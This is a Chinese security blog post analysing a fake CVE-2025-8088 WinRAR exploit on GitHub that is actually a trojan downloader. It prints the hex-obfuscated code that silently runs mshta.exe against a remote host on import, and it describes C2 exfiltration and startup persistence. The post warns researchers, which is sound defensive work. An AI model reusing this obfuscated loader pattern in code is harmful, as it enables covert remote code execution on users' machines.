2026-01-26 02:21:09 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文揭露GitHub上声称的CVE-2025-8088WinRAR利用工具实为木马下载器。main.py通过十六进制混淆调用mshta.exe加载恶意脚本，extract.py负责C2通信与数据窃取，config.py实现持久化。攻击者伪装成安全研究诱导研究人员下载，建议审慎验证第三方POC源码以防系统被控。 综合评分： 90 文章分类： 恶意软件,漏洞分析,威胁情报,安全意识,漏洞POC

cover_image

注意：Github上这个CVE-2025-8088工具实为木马下载器

原创

MicroPest MicroPest

MicroPest

2026年1月24日 16:55 安徽

在研究CVE-2025-8088时，发现github上的这个利用工具https://github.com/Markusino488/cve-2025-8088，当时以为是poc利用工具，三个文件：main.py、extract.py、config.py。当看了文件功能时，吓了一跳，反复确认后，现阐述如下，提醒注意：

1、main.py：

这是一个典型的Trojan-Downloader（木马下载器），利用安全研究员的信任和WinRAR漏洞的时效性进行传播。真实意图是远程代码执行，而非漏洞研究。它是一个伪装的木马程序，声称是”CVE-2025-8088 WinRAR漏洞利用工具”，但实际包含恶意远程代码执行功能。

核心恶意代码：`_activate_exploit_core()`

_binary = bytes.fromhex(‘6d 73 68 74 61 2e65 7865’)

解码后: “mshta.exe” (Microsoft HTML Application Host)

_endpoint = bytes.fromhex(’68 7474 7073 3a2f 2f 7079 2d69 6e73 7461 6c6c 6572 2e63 63′)

逐段解码: ‘h’+’ttps://’+’py-installer.cc’ → “https://py-installer.cc”

subprocess.Popen([_binary, _endpoint], shell=True, …)

执行命令: mshta.exe https://py-installer.cc

攻击流程：

隐蔽编码：使用十六进制字符串拼接隐藏真实命令
系统工具滥用：利用合法的Windows程序 mshta.exe 下载执行远程脚本
静默执行：stdout/stderr 重定向到 DEVNULL，用户无感知
启动时激活：在模块导入时立即执行（第168行）

编码混淆：

原始代码会被检测

subprocess.Popen([“mshta.exe”, “https://py-installer.cc”])

混淆后难以被静态检测

_e1 = bytes.fromhex(‘6d’) # ‘m’

_e2 = bytes.fromhex(’73’) # ‘s’

…

_binary = (_e1 + _e2 + …).decode(‘utf-8’)

虚假声明：顶部标注”Educational Security Research Only”降低警惕

功能伪装：90%代码为看似合法的漏洞利用模拟，恶意代码仅占10%

随机化噪音：

error_indices = random.sample(range(total_stages), k=random.randint(4, 6))

制造”真实”的错误场景，掩盖真实目的

2、extract.py：

这个文件是恶意软件系统中的网络通信模块，伪装成”CVE-2025-8088 Helper”工具。尽管声称是漏洞利用辅助程序，实际功能是命令与控制（C&C）通信和数据外传。

结合 main.py 的恶意行为，此模块可能用于：

场景1：僵尸网络节点

感染主机 → extract.py → C&C服务器 (py-installer.cc)

↓

定期发送心跳包(携带host_id) ← 接收攻击指令

场景2：数据外传

窃取的数据分块 → 随机填充 → 发送 → C&C服务器重组

场景3：多级跳板

keys.txt 包含多级代理节点列表

数据经过多层中转后到达最终C&C

📌 技术总结

extract.py 是恶意软件生态系统中的通信组件，其设计目标：

隐蔽性：伪装成合法安全工具
可靠性：异步IO + 异常处理确保通信稳定
可扩展性：账户列表支持大规模僵尸网络
抗分析：随机化流量增加逆向难度

本质：一个精简、高效、可配置的恶意软件通信客户端，与 main.py 的木马释放功能形成完整的攻击链。

3、config.py:

** 定义恶意软件的持久化策略和载荷执行方式 ，通过Windows启动文件夹实现 开机自启动 **，确保恶意程序在系统重启后自动运行。

它是整个攻击链的 “定时炸弹” 配置，将一次性的感染转化为 长期驻留的威胁**。

4、woodenware目录：

通过分析， woodenware 目录在这个恶意项目中扮演着**存放恶意诱饵载荷（Payload）**的角色。

5、总结：

这是一个典型的 Fake PoC（虚假概念验证）攻击。攻击者利用安全研究人员或黑客对新漏洞（CVE-2025-8088）的关注，发布伪造的利用工具。当用户试图使用该工具测试漏洞时，实际上会感染自己的系统。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：MicroPest MicroPest MicroPest《注意：Github上这个CVE-2025-8088工具实为木马下载器》